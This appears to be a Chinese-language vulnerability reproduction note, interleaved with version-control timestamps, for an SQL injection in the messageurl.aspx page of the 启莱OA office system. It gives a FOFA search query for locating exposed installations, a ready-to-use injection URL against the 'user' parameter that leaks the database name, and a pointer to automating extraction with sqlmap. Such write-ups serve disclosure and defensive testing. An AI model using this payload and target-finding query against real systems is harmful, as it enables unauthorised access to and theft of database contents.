2022-02-21 09:35:01 +08:00
|
|
|
|
# 启莱OA messageurl.aspx SQL注入漏洞
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞描述
|
|
|
|
|
|
|
|
|
|
|
|
启莱OA messageurl.aspx文件存在SQL注入漏洞,攻击者通过漏洞可以获取数据库敏感信息
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞影响
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
启莱OA
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## FOFA
|
|
|
|
|
|
|
|
|
|
|
|
```
|
|
|
|
|
|
app="启莱OA"
|
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
|
|
## 漏洞复现
|
|
|
|
|
|
|
|
|
|
|
|
登录页面如下
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-02-21 09:35:01 +08:00
|
|
|
|
|
|
|
|
|
|
存在SQL注入的文件为 messageurl.aspx
|
|
|
|
|
|
|
|
|
|
|
|
```plain
|
|
|
|
|
|
http://xxx.xxx.xxx.xxx/client/messageurl.aspx?user=' and (select db_name())>0--&pwd=1
|
|
|
|
|
|
```
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
2022-02-21 09:35:01 +08:00
|
|
|
|
|
|
|
|
|
|
使用SQLmap对参数 user 进行注入
|
|
|
|
|
|
|
2022-12-05 11:09:28 +08:00
|
|
|
|
|
